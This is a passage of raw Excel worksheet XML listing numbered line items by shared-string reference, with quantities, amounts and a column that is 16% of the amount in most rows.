      <c r="F2603" s="238" t="s">
        <v>12002</v>
      </c>
      <c r="G2603" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2603" s="10">
        <v>1</v>
      </c>
      <c r="I2603" s="14">
        <v>1900</v>
      </c>
      <c r="J2603" s="15">
        <v>304</v>
      </c>
      <c r="K2603" s="16"/>
    </row>
    <row r="2604" spans="2:11">
      <c r="B2604" s="9">
        <v>2638</v>
      </c>
      <c r="C2604" s="238" t="s">
        <v>12003</v>
      </c>
      <c r="D2604" s="238" t="s">
        <v>12004</v>
      </c>
      <c r="E2604" s="238" t="s">
        <v>12005</v>
      </c>
      <c r="F2604" s="238" t="s">
        <v>12006</v>
      </c>
      <c r="G2604" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2604" s="10">
        <v>1</v>
      </c>
      <c r="I2604" s="14">
        <v>60</v>
      </c>
      <c r="J2604" s="15">
        <v>9.6</v>
      </c>
      <c r="K2604" s="16"/>
    </row>
    <row r="2605" spans="2:11">
      <c r="B2605" s="9">
        <v>2639</v>
      </c>
      <c r="C2605" s="238" t="s">
        <v>12007</v>
      </c>
      <c r="D2605" s="238" t="s">
        <v>12008</v>
      </c>
      <c r="E2605" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F2605" s="238" t="s">
        <v>12009</v>
      </c>
      <c r="G2605" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2605" s="10">
        <v>1</v>
      </c>
      <c r="I2605" s="14">
        <v>1435.9</v>
      </c>
      <c r="J2605" s="15">
        <v>229.744</v>
      </c>
      <c r="K2605" s="16"/>
    </row>
    <row r="2606" spans="2:11">
      <c r="B2606" s="9">
        <v>2640</v>
      </c>
      <c r="C2606" s="238" t="s">
        <v>12010</v>
      </c>
      <c r="D2606" s="238" t="s">
        <v>12011</v>
      </c>
      <c r="E2606" s="238" t="s">
        <v>11870</v>
      </c>
      <c r="F2606" s="238" t="s">
        <v>7809</v>
      </c>
      <c r="G2606" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2606" s="10">
        <v>1</v>
      </c>
      <c r="I2606" s="14">
        <v>16</v>
      </c>
      <c r="J2606" s="15">
        <v>2.56</v>
      </c>
      <c r="K2606" s="16"/>
    </row>
    <row r="2607" spans="2:11">
      <c r="B2607" s="9">
        <v>2641</v>
      </c>
      <c r="C2607" s="238" t="s">
        <v>12012</v>
      </c>
      <c r="D2607" s="238" t="s">
        <v>12013</v>
      </c>
      <c r="E2607" s="238" t="s">
        <v>12014</v>
      </c>
      <c r="F2607" s="238" t="s">
        <v>12015</v>
      </c>
      <c r="G2607" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2607" s="10">
        <v>1</v>
      </c>
      <c r="I2607" s="14">
        <v>10</v>
      </c>
      <c r="J2607" s="15">
        <v>1.6</v>
      </c>
      <c r="K2607" s="16"/>
    </row>
    <row r="2608" spans="2:11">
      <c r="B2608" s="9">
        <v>2642</v>
      </c>
      <c r="C2608" s="238" t="s">
        <v>12016</v>
      </c>
      <c r="D2608" s="238" t="s">
        <v>12017</v>
      </c>
      <c r="E2608" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2608" s="238" t="s">
        <v>12018</v>
      </c>
      <c r="G2608" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2608" s="10">
        <v>5</v>
      </c>
      <c r="I2608" s="14">
        <v>118.86</v>
      </c>
      <c r="J2608" s="15">
        <v>19.016</v>
      </c>
      <c r="K2608" s="16"/>
    </row>
    <row r="2609" spans="2:11">
      <c r="B2609" s="9">
        <v>2643</v>
      </c>
      <c r="C2609" s="238" t="s">
        <v>12019</v>
      </c>
      <c r="D2609" s="238" t="s">
        <v>12020</v>
      </c>
      <c r="E2609" s="238" t="s">
        <v>7800</v>
      </c>
      <c r="F2609" s="238" t="s">
        <v>12021</v>
      </c>
      <c r="G2609" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2609" s="10">
        <v>3</v>
      </c>
      <c r="I2609" s="14">
        <v>114</v>
      </c>
      <c r="J2609" s="15">
        <v>45.6</v>
      </c>
      <c r="K2609" s="16"/>
    </row>
    <row r="2610" spans="2:11">
      <c r="B2610" s="9">
        <v>2644</v>
      </c>
      <c r="C2610" s="238" t="s">
        <v>12022</v>
      </c>
      <c r="D2610" s="238" t="s">
        <v>12023</v>
      </c>
      <c r="E2610" s="238" t="s">
        <v>12005</v>
      </c>
      <c r="F2610" s="238" t="s">
        <v>12024</v>
      </c>
      <c r="G2610" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2610" s="10">
        <v>6</v>
      </c>
      <c r="I2610" s="14">
        <v>13.09</v>
      </c>
      <c r="J2610" s="15">
        <v>5.232</v>
      </c>
      <c r="K2610" s="16"/>
    </row>
    <row r="2611" spans="2:11">
      <c r="B2611" s="9">
        <v>2645</v>
      </c>
      <c r="C2611" s="238" t="s">
        <v>12025</v>
      </c>
      <c r="D2611" s="238" t="s">
        <v>5536</v>
      </c>
      <c r="E2611" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F2611" s="9"/>
      <c r="G2611" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2611" s="10">
        <v>3</v>
      </c>
      <c r="I2611" s="14">
        <v>14.01</v>
      </c>
      <c r="J2611" s="15">
        <v>2.2416</v>
      </c>
      <c r="K2611" s="16"/>
    </row>
    <row r="2612" spans="2:11">
      <c r="B2612" s="9">
        <v>2646</v>
      </c>
      <c r="C2612" s="238" t="s">
        <v>12026</v>
      </c>
      <c r="D2612" s="238" t="s">
        <v>12027</v>
      </c>
      <c r="E2612" s="238" t="s">
        <v>4689</v>
      </c>
      <c r="F2612" s="238" t="s">
        <v>12028</v>
      </c>
      <c r="G2612" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2612" s="10">
        <v>3</v>
      </c>
      <c r="I2612" s="14">
        <v>2.99</v>
      </c>
      <c r="J2612" s="15">
        <v>0.48</v>
      </c>
      <c r="K2612" s="16"/>
    </row>
    <row r="2613" spans="2:11">
      <c r="B2613" s="9">
        <v>2647</v>
      </c>
      <c r="C2613" s="238" t="s">
        <v>12029</v>
      </c>
      <c r="D2613" s="9"/>
      <c r="E2613" s="238" t="s">
        <v>7752</v>
      </c>
      <c r="F2613" s="238" t="s">
        <v>12030</v>
      </c>
      <c r="G2613" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2613" s="10">
        <v>6</v>
      </c>
      <c r="I2613" s="14">
        <v>232.9</v>
      </c>
      <c r="J2613" s="15">
        <v>37.2672</v>
      </c>
      <c r="K2613" s="16"/>
    </row>
    <row r="2614" spans="2:11">
      <c r="B2614" s="9">
        <v>2648</v>
      </c>
      <c r="C2614" s="238" t="s">
        <v>12031</v>
      </c>
      <c r="D2614" s="9"/>
      <c r="E2614" s="238" t="s">
        <v>466</v>
      </c>
      <c r="F2614" s="238" t="s">
        <v>12032</v>
      </c>
      <c r="G2614" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2614" s="10">
        <v>1</v>
      </c>
      <c r="I2614" s="14">
        <v>15.05</v>
      </c>
      <c r="J2614" s="15">
        <v>2.408</v>
      </c>
      <c r="K2614" s="16"/>
    </row>
    <row r="2615" spans="2:11">
      <c r="B2615" s="9">
        <v>2649</v>
      </c>
      <c r="C2615" s="238" t="s">
        <v>12033</v>
      </c>
      <c r="D2615" s="238" t="s">
        <v>4890</v>
      </c>
      <c r="E2615" s="238" t="s">
        <v>4981</v>
      </c>
      <c r="F2615" s="238" t="s">
        <v>12034</v>
      </c>
      <c r="G2615" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2615" s="10">
        <v>1</v>
      </c>
      <c r="I2615" s="14">
        <v>30.68</v>
      </c>
      <c r="J2615" s="15">
        <v>4.9088</v>
      </c>
      <c r="K2615" s="16"/>
    </row>
    <row r="2616" spans="2:11">
      <c r="B2616" s="9">
        <v>2650</v>
      </c>
      <c r="C2616" s="238" t="s">
        <v>12035</v>
      </c>
      <c r="D2616" s="238" t="s">
        <v>12036</v>
      </c>
      <c r="E2616" s="238" t="s">
        <v>10991</v>
      </c>
      <c r="F2616" s="238" t="s">
        <v>12037</v>
      </c>
      <c r="G2616" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2616" s="10">
        <v>1</v>
      </c>
      <c r="I2616" s="14">
        <v>427.35</v>
      </c>
      <c r="J2616" s="15">
        <v>68.376</v>
      </c>
      <c r="K2616" s="16"/>
    </row>
    <row r="2617" spans="2:11">
      <c r="B2617" s="9">
        <v>2651</v>
      </c>
      <c r="C2617" s="238" t="s">
        <v>12038</v>
      </c>
      <c r="D2617" s="238" t="s">
        <v>12039</v>
      </c>
      <c r="E2617" s="238" t="s">
        <v>5222</v>
      </c>
      <c r="F2617" s="238" t="s">
        <v>12040</v>
      </c>
      <c r="G2617" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2617" s="10">
        <v>6</v>
      </c>
      <c r="I2617" s="14">
        <v>1074.58</v>
      </c>
      <c r="J2617" s="15">
        <v>171.936</v>
      </c>
      <c r="K2617" s="16"/>
    </row>
    <row r="2618" spans="2:11">
      <c r="B2618" s="9">
        <v>2652</v>
      </c>
      <c r="C2618" s="238" t="s">
        <v>12041</v>
      </c>
      <c r="D2618" s="238" t="s">
        <v>12042</v>
      </c>
      <c r="E2618" s="238" t="s">
        <v>12043</v>
      </c>
      <c r="F2618" s="238" t="s">
        <v>12044</v>
      </c>
      <c r="G2618" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2618" s="10">
        <v>3</v>
      </c>
      <c r="I2618" s="14">
        <v>180</v>
      </c>
      <c r="J2618" s="15">
        <v>28.8</v>
      </c>
      <c r="K2618" s="16"/>
    </row>
    <row r="2619" spans="2:11">
      <c r="B2619" s="9">
        <v>2653</v>
      </c>
      <c r="C2619" s="238" t="s">
        <v>12045</v>
      </c>
      <c r="D2619" s="238" t="s">
        <v>12046</v>
      </c>
      <c r="E2619" s="238" t="s">
        <v>11963</v>
      </c>
      <c r="F2619" s="9"/>
      <c r="G2619" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2619" s="10">
        <v>1</v>
      </c>
      <c r="I2619" s="14">
        <v>440.76</v>
      </c>
      <c r="J2619" s="15">
        <v>70.5216</v>
      </c>
      <c r="K2619" s="16"/>
    </row>
    <row r="2620" spans="2:11">
      <c r="B2620" s="9">
        <v>2654</v>
      </c>
      <c r="C2620" s="238" t="s">
        <v>12047</v>
      </c>
      <c r="D2620" s="238" t="s">
        <v>12048</v>
      </c>
      <c r="E2620" s="238" t="s">
        <v>8300</v>
      </c>
      <c r="F2620" s="238" t="s">
        <v>12049</v>
      </c>
      <c r="G2620" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2620" s="10">
        <v>5</v>
      </c>
      <c r="I2620" s="14">
        <v>96.44</v>
      </c>
      <c r="J2620" s="15">
        <v>15.432</v>
      </c>
      <c r="K2620" s="16"/>
    </row>
    <row r="2621" spans="2:11">
      <c r="B2621" s="9">
        <v>2655</v>
      </c>
      <c r="C2621" s="238" t="s">
        <v>12050</v>
      </c>
      <c r="D2621" s="238" t="s">
        <v>9420</v>
      </c>
      <c r="E2621" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F2621" s="9"/>
      <c r="G2621" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2621" s="10">
        <v>4</v>
      </c>
      <c r="I2621" s="14">
        <v>273.5</v>
      </c>
      <c r="J2621" s="15">
        <v>43.7632</v>
      </c>
      <c r="K2621" s="16"/>
    </row>
    <row r="2622" spans="2:11">
      <c r="B2622" s="9">
        <v>2656</v>
      </c>
      <c r="C2622" s="238" t="s">
        <v>12051</v>
      </c>
      <c r="D2622" s="238" t="s">
        <v>12052</v>
      </c>
      <c r="E2622" s="238" t="s">
        <v>5327</v>
      </c>
      <c r="F2622" s="238" t="s">
        <v>12053</v>
      </c>
      <c r="G2622" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2622" s="10">
        <v>1</v>
      </c>
      <c r="I2622" s="14">
        <v>1683.76</v>
      </c>
      <c r="J2622" s="15">
        <v>269.4016</v>
      </c>
      <c r="K2622" s="16"/>
    </row>
    <row r="2623" spans="2:11">
      <c r="B2623" s="9">
        <v>2657</v>
      </c>
      <c r="C2623" s="238" t="s">
        <v>12054</v>
      </c>
      <c r="D2623" s="238" t="s">
        <v>12055</v>
      </c>
      <c r="E2623" s="238" t="s">
        <v>12056</v>
      </c>
      <c r="F2623" s="9"/>
      <c r="G2623" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2623" s="10">
        <v>10</v>
      </c>
      <c r="I2623" s="14">
        <v>4786.32</v>
      </c>
      <c r="J2623" s="15">
        <v>765.808</v>
      </c>
      <c r="K2623" s="16"/>
    </row>
    <row r="2624" spans="2:11">
      <c r="B2624" s="9">
        <v>2658</v>
      </c>
      <c r="C2624" s="238" t="s">
        <v>12057</v>
      </c>
      <c r="D2624" s="238" t="s">
        <v>12058</v>
      </c>
      <c r="E2624" s="238" t="s">
        <v>12059</v>
      </c>
      <c r="F2624" s="238" t="s">
        <v>12060</v>
      </c>
      <c r="G2624" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2624" s="10">
        <v>6</v>
      </c>
      <c r="I2624" s="14">
        <v>763.76</v>
      </c>
      <c r="J2624" s="15">
        <v>122.1984</v>
      </c>
      <c r="K2624" s="16"/>
    </row>
    <row r="2625" spans="2:11">
      <c r="B2625" s="9">
        <v>2659</v>
      </c>
      <c r="C2625" s="238" t="s">
        <v>12061</v>
      </c>
      <c r="D2625" s="238" t="s">
        <v>12062</v>
      </c>
      <c r="E2625" s="238" t="s">
        <v>12059</v>
      </c>
      <c r="F2625" s="238" t="s">
        <v>12063</v>
      </c>
      <c r="G2625" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2625" s="10">
        <v>2</v>
      </c>
      <c r="I2625" s="14">
        <v>99.15</v>
      </c>
      <c r="J2625" s="15">
        <v>15.8656</v>
      </c>
      <c r="K2625" s="16"/>
    </row>
    <row r="2626" spans="2:11">
      <c r="B2626" s="9">
        <v>2660</v>
      </c>
      <c r="C2626" s="238" t="s">
        <v>12064</v>
      </c>
      <c r="D2626" s="238" t="s">
        <v>12065</v>
      </c>
      <c r="E2626" s="238" t="s">
        <v>12066</v>
      </c>
      <c r="F2626" s="238" t="s">
        <v>12067</v>
      </c>
      <c r="G2626" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2626" s="10">
        <v>2</v>
      </c>
      <c r="I2626" s="14">
        <v>192</v>
      </c>
      <c r="J2626" s="15">
        <v>30.72</v>
      </c>
      <c r="K2626" s="16"/>
    </row>
    <row r="2627" spans="2:11">
      <c r="B2627" s="9">
        <v>2661</v>
      </c>
      <c r="C2627" s="238" t="s">
        <v>12068</v>
      </c>
      <c r="D2627" s="238" t="s">
        <v>12069</v>
      </c>
      <c r="E2627" s="238" t="s">
        <v>12070</v>
      </c>
      <c r="F2627" s="238" t="s">
        <v>12071</v>
      </c>
      <c r="G2627" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2627" s="10">
        <v>3</v>
      </c>
      <c r="I2627" s="14">
        <v>1919.41</v>
      </c>
      <c r="J2627" s="15">
        <v>307.104</v>
      </c>
      <c r="K2627" s="16"/>
    </row>
    <row r="2628" spans="2:11">
      <c r="B2628" s="9">
        <v>2662</v>
      </c>
      <c r="C2628" s="238" t="s">
        <v>12072</v>
      </c>
      <c r="D2628" s="238" t="s">
        <v>12073</v>
      </c>
      <c r="E2628" s="238" t="s">
        <v>3897</v>
      </c>
      <c r="F2628" s="238" t="s">
        <v>12074</v>
      </c>
      <c r="G2628" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2628" s="10">
        <v>2</v>
      </c>
      <c r="I2628" s="14">
        <v>3931.62</v>
      </c>
      <c r="J2628" s="15">
        <v>629.0592</v>
      </c>
      <c r="K2628" s="16"/>
    </row>
    <row r="2629" spans="2:11">
      <c r="B2629" s="9">
        <v>2663</v>
      </c>
      <c r="C2629" s="238" t="s">
        <v>12075</v>
      </c>
      <c r="D2629" s="238" t="s">
        <v>12076</v>
      </c>
      <c r="E2629" s="238" t="s">
        <v>9263</v>
      </c>
      <c r="F2629" s="238" t="s">
        <v>12077</v>
      </c>
      <c r="G2629" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2629" s="10">
        <v>4</v>
      </c>
      <c r="I2629" s="14">
        <v>957.26</v>
      </c>
      <c r="J2629" s="15">
        <v>153.1648</v>
      </c>
      <c r="K2629" s="16"/>
    </row>
    <row r="2630" spans="2:11">
      <c r="B2630" s="9">
        <v>2664</v>
      </c>
      <c r="C2630" s="238" t="s">
        <v>12078</v>
      </c>
      <c r="D2630" s="238" t="s">
        <v>12079</v>
      </c>
      <c r="E2630" s="238" t="s">
        <v>4909</v>
      </c>
      <c r="F2630" s="238" t="s">
        <v>12080</v>
      </c>
      <c r="G2630" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2630" s="10">
        <v>30</v>
      </c>
      <c r="I2630" s="14">
        <v>176.09</v>
      </c>
      <c r="J2630" s="15">
        <v>28.176</v>
      </c>
      <c r="K2630" s="16"/>
    </row>
    <row r="2631" spans="2:11">
      <c r="B2631" s="9">
        <v>2665</v>
      </c>
      <c r="C2631" s="238" t="s">
        <v>12081</v>
      </c>
      <c r="D2631" s="238" t="s">
        <v>4757</v>
      </c>
      <c r="E2631" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F2631" s="238" t="s">
        <v>12082</v>
      </c>
      <c r="G2631" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H2631" s="10">
        <v>3</v>
      </c>
      <c r="I2631" s="14">
        <v>461.54</v>
      </c>
      <c r="J2631" s="15">
        <v>73.848</v>
      </c>
      <c r="K2631" s="16"/>
    </row>
    <row r="2632" spans="2:11">
      <c r="B2632" s="9">
        <v>2666</v>
      </c>
      <c r="C2632" s="238" t="s">
        <v>12083</v>
      </c>
      <c r="D2632" s="238" t="s">
        <v>12084</v>
      </c>
      <c r="E2632" s="238" t="s">
        <v>12085</v>
      </c>
      <c r="F2632" s="238" t="s">
        <v>12086</v>
      </c>
      <c r="G2632" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2632" s="10">
        <v>3</v>
      </c>
      <c r="I2632" s="14">
        <v>201.22</v>
      </c>
      <c r="J2632" s="15">
        <v>32.1936</v>
      </c>
      <c r="K2632" s="16"/>
    </row>
    <row r="2633" spans="2:11">
      <c r="B2633" s="9">
        <v>2667</v>
      </c>
      <c r="C2633" s="238" t="s">
        <v>12087</v>
      </c>
      <c r="D2633" s="238" t="s">
        <v>12088</v>
      </c>
      <c r="E2633" s="238" t="s">
        <v>12066</v>
      </c>
      <c r="F2633" s="238" t="s">
        <v>12089</v>
      </c>
      <c r="G2633" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2633" s="10">
        <v>2</v>
      </c>
      <c r="I2633" s="14">
        <v>272</v>
      </c>
      <c r="J2633" s="15">
        <v>43.52</v>
      </c>
      <c r="K2633" s="16"/>
    </row>
    <row r="2634" spans="2:11">
      <c r="B2634" s="9">
        <v>2668</v>
      </c>
      <c r="C2634" s="238" t="s">
        <v>12090</v>
      </c>
      <c r="D2634" s="238" t="s">
        <v>12091</v>
      </c>
      <c r="E2634" s="238" t="s">
        <v>10519</v>
      </c>
      <c r="F2634" s="238" t="s">
        <v>12092</v>
      </c>
      <c r="G2634" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2634" s="10">
        <v>15</v>
      </c>
      <c r="I2634" s="14">
        <v>13.74</v>
      </c>
      <c r="J2634" s="15">
        <v>2.208</v>
      </c>
      <c r="K2634" s="16"/>
    </row>
    <row r="2635" spans="2:11">
      <c r="B2635" s="9">
        <v>2669</v>
      </c>
      <c r="C2635" s="238" t="s">
        <v>12093</v>
      </c>
      <c r="D2635" s="238" t="s">
        <v>12094</v>
      </c>
      <c r="E2635" s="238" t="s">
        <v>12095</v>
      </c>
      <c r="F2635" s="238" t="s">
        <v>12096</v>
      </c>
      <c r="G2635" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2635" s="10">
        <v>2</v>
      </c>
      <c r="I2635" s="14">
        <v>2704.85</v>
      </c>
      <c r="J2635" s="15">
        <v>432.7776</v>
      </c>
      <c r="K2635" s="16"/>
    </row>
    <row r="2636" spans="2:11">
      <c r="B2636" s="9">
        <v>2670</v>
      </c>
      <c r="C2636" s="238" t="s">
        <v>12097</v>
      </c>
      <c r="D2636" s="238" t="s">
        <v>12098</v>
      </c>
      <c r="E2636" s="238" t="s">
        <v>12099</v>
      </c>
      <c r="F2636" s="238" t="s">
        <v>12100</v>
      </c>
      <c r="G2636" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2636" s="10">
        <v>3</v>
      </c>
      <c r="I2636" s="14">
        <v>132</v>
      </c>
      <c r="J2636" s="15">
        <v>21.12</v>
      </c>
      <c r="K2636" s="16"/>
    </row>
    <row r="2637" spans="2:11">
      <c r="B2637" s="9">
        <v>2671</v>
      </c>
      <c r="C2637" s="238" t="s">
        <v>12101</v>
      </c>
      <c r="D2637" s="238" t="s">
        <v>12102</v>
      </c>
      <c r="E2637" s="238" t="s">
        <v>12103</v>
      </c>
      <c r="F2637" s="238" t="s">
        <v>12104</v>
      </c>
      <c r="G2637" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2637" s="10">
        <v>4</v>
      </c>
      <c r="I2637" s="14">
        <v>933.57</v>
      </c>
      <c r="J2637" s="15">
        <v>149.3696</v>
      </c>
      <c r="K2637" s="16"/>
    </row>
    <row r="2638" spans="2:11">
      <c r="B2638" s="9">
        <v>2672</v>
      </c>
      <c r="C2638" s="238" t="s">
        <v>12105</v>
      </c>
      <c r="D2638" s="238" t="s">
        <v>6432</v>
      </c>
      <c r="E2638" s="238" t="s">
        <v>6433</v>
      </c>
      <c r="F2638" s="238" t="s">
        <v>12106</v>
      </c>
      <c r="G2638" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H2638" s="10">
        <v>1</v>
      </c>
      <c r="I2638" s="14">
        <v>141.03</v>
      </c>
      <c r="J2638" s="15">
        <v>22.5648</v>
      </c>
      <c r="K2638" s="16"/>
    </row>
    <row r="2639" spans="2:11">
      <c r="B2639" s="9">
        <v>2673</v>
      </c>
      <c r="C2639" s="238" t="s">
        <v>12107</v>
      </c>
      <c r="D2639" s="238" t="s">
        <v>12108</v>
      </c>
      <c r="E2639" s="238" t="s">
        <v>3053</v>
      </c>
      <c r="F2639" s="238" t="s">
        <v>4598</v>
      </c>
      <c r="G2639" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2639" s="10">
        <v>3</v>
      </c>
      <c r="I2639" s="14">
        <v>1846.15</v>
      </c>
      <c r="J2639" s="15">
        <v>295.3824</v>
      </c>
      <c r="K2639" s="16"/>
    </row>
    <row r="2640" spans="2:11">
      <c r="B2640" s="9">
        <v>2674</v>
      </c>
      <c r="C2640" s="238" t="s">
        <v>12109</v>
      </c>
      <c r="D2640" s="238" t="s">
        <v>12110</v>
      </c>
      <c r="E2640" s="238" t="s">
        <v>12111</v>
      </c>
      <c r="F2640" s="238" t="s">
        <v>12112</v>
      </c>
      <c r="G2640" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2640" s="10">
        <v>39</v>
      </c>
      <c r="I2640" s="14">
        <v>2250.05</v>
      </c>
      <c r="J2640" s="15">
        <v>359.9856</v>
      </c>
      <c r="K2640" s="16"/>
    </row>
    <row r="2641" spans="2:11">
      <c r="B2641" s="9">
        <v>2675</v>
      </c>
      <c r="C2641" s="238" t="s">
        <v>12113</v>
      </c>
      <c r="D2641" s="238" t="s">
        <v>12114</v>
      </c>
      <c r="E2641" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2641" s="238" t="s">
        <v>12115</v>
      </c>
      <c r="G2641" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2641" s="10">
        <v>120</v>
      </c>
      <c r="I2641" s="14">
        <v>15.38</v>
      </c>
      <c r="J2641" s="15">
        <v>2.496</v>
      </c>
      <c r="K2641" s="16"/>
    </row>
    <row r="2642" spans="2:11">
      <c r="B2642" s="9">
        <v>2676</v>
      </c>
      <c r="C2642" s="238" t="s">
        <v>12116</v>
      </c>
      <c r="D2642" s="238" t="s">
        <v>12117</v>
      </c>
      <c r="E2642" s="238" t="s">
        <v>3053</v>
      </c>
      <c r="F2642" s="238" t="s">
        <v>12118</v>
      </c>
      <c r="G2642" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2642" s="10">
        <v>2</v>
      </c>
      <c r="I2642" s="14">
        <v>2188.04</v>
      </c>
      <c r="J2642" s="15">
        <v>350.0864</v>
      </c>
      <c r="K2642" s="16"/>
    </row>
    <row r="2643" spans="2:11">
      <c r="B2643" s="9">
        <v>2677</v>
      </c>
      <c r="C2643" s="238" t="s">
        <v>12119</v>
      </c>
      <c r="D2643" s="238" t="s">
        <v>12120</v>
      </c>
      <c r="E2643" s="238" t="s">
        <v>12121</v>
      </c>
      <c r="F2643" s="238" t="s">
        <v>12122</v>
      </c>
      <c r="G2643" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2643" s="10">
        <v>2</v>
      </c>
      <c r="I2643" s="14">
        <v>615.38</v>
      </c>
      <c r="J2643" s="15">
        <v>98.4608</v>
      </c>
      <c r="K2643" s="16"/>
    </row>
    <row r="2644" spans="2:11">
      <c r="B2644" s="9">
        <v>2678</v>
      </c>
      <c r="C2644" s="238" t="s">
        <v>12123</v>
      </c>
      <c r="D2644" s="238" t="s">
        <v>11917</v>
      </c>
      <c r="E2644" s="238" t="s">
        <v>12124</v>
      </c>
      <c r="F2644" s="238" t="s">
        <v>12125</v>
      </c>
      <c r="G2644" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2644" s="10">
        <v>5</v>
      </c>
      <c r="I2644" s="14">
        <v>363.25</v>
      </c>
      <c r="J2644" s="15">
        <v>58.12</v>
      </c>
      <c r="K2644" s="16"/>
    </row>
    <row r="2645" spans="2:11">
      <c r="B2645" s="9">
        <v>2679</v>
      </c>
      <c r="C2645" s="238" t="s">
        <v>12126</v>
      </c>
      <c r="D2645" s="9"/>
      <c r="E2645" s="238" t="s">
        <v>3053</v>
      </c>
      <c r="F2645" s="238" t="s">
        <v>12127</v>
      </c>
      <c r="G2645" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H2645" s="10">
        <v>2</v>
      </c>
      <c r="I2645" s="14">
        <v>376.06</v>
      </c>
      <c r="J2645" s="15">
        <v>60.1696</v>
      </c>
      <c r="K2645" s="16"/>
    </row>
    <row r="2646" spans="2:11">
      <c r="B2646" s="9">
        <v>2680</v>
      </c>
      <c r="C2646" s="238" t="s">
        <v>12128</v>
      </c>
      <c r="D2646" s="238" t="s">
        <v>12108</v>
      </c>
      <c r="E2646" s="238" t="s">
        <v>3053</v>
      </c>
      <c r="F2646" s="238" t="s">
        <v>12129</v>
      </c>
      <c r="G2646" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H2646" s="10">
        <v>3</v>
      </c>
      <c r="I2646" s="14">
        <v>4769.23</v>
      </c>
      <c r="J2646" s="15">
        <v>763.0752</v>
      </c>
      <c r="K2646" s="16"/>
    </row>
    <row r="2647" spans="2:11">
      <c r="B2647" s="9">
        <v>2681</v>
      </c>
      <c r="C2647" s="238" t="s">
        <v>12130</v>
      </c>
      <c r="D2647" s="238" t="s">
        <v>12108</v>
      </c>
      <c r="E2647" s="238" t="s">
        <v>3053</v>
      </c>
      <c r="F2647" s="238" t="s">
        <v>12131</v>
      </c>
      <c r="G2647" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H2647" s="10">
        <v>3</v>
      </c>
      <c r="I2647" s="14">
        <v>4831.91</v>
      </c>
      <c r="J2647" s="15">
        <v>773.1072</v>
      </c>
      <c r="K2647" s="16"/>
    </row>
    <row r="2648" spans="2:11">
      <c r="B2648" s="9">
        <v>2682</v>
      </c>
      <c r="C2648" s="238" t="s">
        <v>12132</v>
      </c>
      <c r="D2648" s="238" t="s">
        <v>12133</v>
      </c>
      <c r="E2648" s="238" t="s">
        <v>12134</v>
      </c>
      <c r="F2648" s="238" t="s">
        <v>12135</v>
      </c>
      <c r="G2648" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H2648" s="10">
        <v>140</v>
      </c>
      <c r="I2648" s="14">
        <v>77.75</v>
      </c>
      <c r="J2648" s="15">
        <v>12.544</v>
      </c>
      <c r="K2648" s="16"/>
    </row>
    <row r="2649" spans="2:11">
      <c r="B2649" s="9">
        <v>2683</v>
      </c>
      <c r="C2649" s="238" t="s">
        <v>12136</v>
      </c>
      <c r="D2649" s="238" t="s">
        <v>12108</v>
      </c>
      <c r="E2649" s="238" t="s">
        <v>3053</v>
      </c>
      <c r="F2649" s="238" t="s">
        <v>12137</v>
      </c>
      <c r="G2649" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H2649" s="10">
        <v>1</v>
      </c>
      <c r="I2649" s="14">
        <v>1153.85</v>
      </c>
      <c r="J2649" s="15">
        <v>184.616</v>
      </c>
      <c r="K2649" s="16"/>
    </row>
    <row r="2650" spans="2:11">
      <c r="B2650" s="9">
        <v>2684</v>
      </c>
      <c r="C2650" s="238" t="s">
        <v>12138</v>
      </c>
      <c r="D2650" s="238" t="s">
        <v>4890</v>
      </c>
      <c r="E2650" s="238" t="s">
        <v>12139</v>
      </c>
      <c r="F2650" s="238" t="s">
        <v>12140</v>
      </c>
      <c r="G2650" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2650" s="10">
        <v>3</v>
      </c>
      <c r="I2650" s="14">
        <v>5641.02</v>
      </c>
      <c r="J2650" s="15">
        <v>902.5632</v>
      </c>
